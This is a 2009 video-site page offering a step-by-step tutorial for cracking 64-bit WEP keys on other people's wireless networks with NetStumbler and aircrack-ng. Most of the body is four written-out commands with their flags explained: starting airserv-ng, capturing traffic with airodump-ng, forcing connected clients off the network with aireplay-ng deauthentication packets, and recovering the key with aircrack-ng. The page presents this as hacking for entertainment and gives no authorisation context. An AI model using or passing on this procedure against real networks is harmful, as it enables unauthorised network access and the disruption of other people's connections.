How to Hack WEP Secured Networks with Aircrack Tutorial

Tags:
Air Aircrack Cantenna Crack Encryption Hacks Hacking Key Network Stumbler Wep Wireless Wpa
Strappodeath
  • Affiliate Submitter:
    Strappodeath
  • International International
  • Comments: 1
  • Views: 2,003
  • Added: 27-Jan-09

you must be disconnected from every network to do this.
doesn't work on every wireless card unfortunately.
you must download both programs linked below

showing you how to hack wireless network secured by a 64bit WEP key
2 programs. net stumbler and aircrack -ng
link:
http://www.netstumbler.com/downloads/
http://www.aircrack-ng.org/doku.php?id=downloads

drivers for wireless card:
http://www.aircrack-ng.org/doku.php?id=install_drivers

command lines i used

Command Prompt One:

C:\aircrack\airserv-ng -d "commview.dll|debug"

Command Prompt Two:

C:\aircrack\airodump-ng -c 11 -w C:\aircrack\wpatst 127.0.0.1:666


-c 11 represents the channel the airodump will scan.

Command Prompt Three:

C:\aircrack\aireplay-ng -0 9 -a BSSID of WAP -c BSSID of Client 127.0.0.1:666


-0 puts aireplay in DeAuth mode, 9 represents how many DeAuth
packets it will send.
-a represents the BSSID of the Wireless Access Point (WAP)
and -c represents the BSSID of the
client connected to that WAP.

Command Prompt Four:

C:\aircrack\aircrack-ng -a 1 C:\aircrack\wpatst-22.cap


1 represents WEP mode, and then put the directory of the capture file

Note: 22 is not default, its just in my readme, change it to suit.

  1. Categories: Entertainment
  2. Favorite On: aurelius4
Comments on

How to Hack WEP Secured Networks with Aircrack Tutorial

0 Comments | Be the first to comment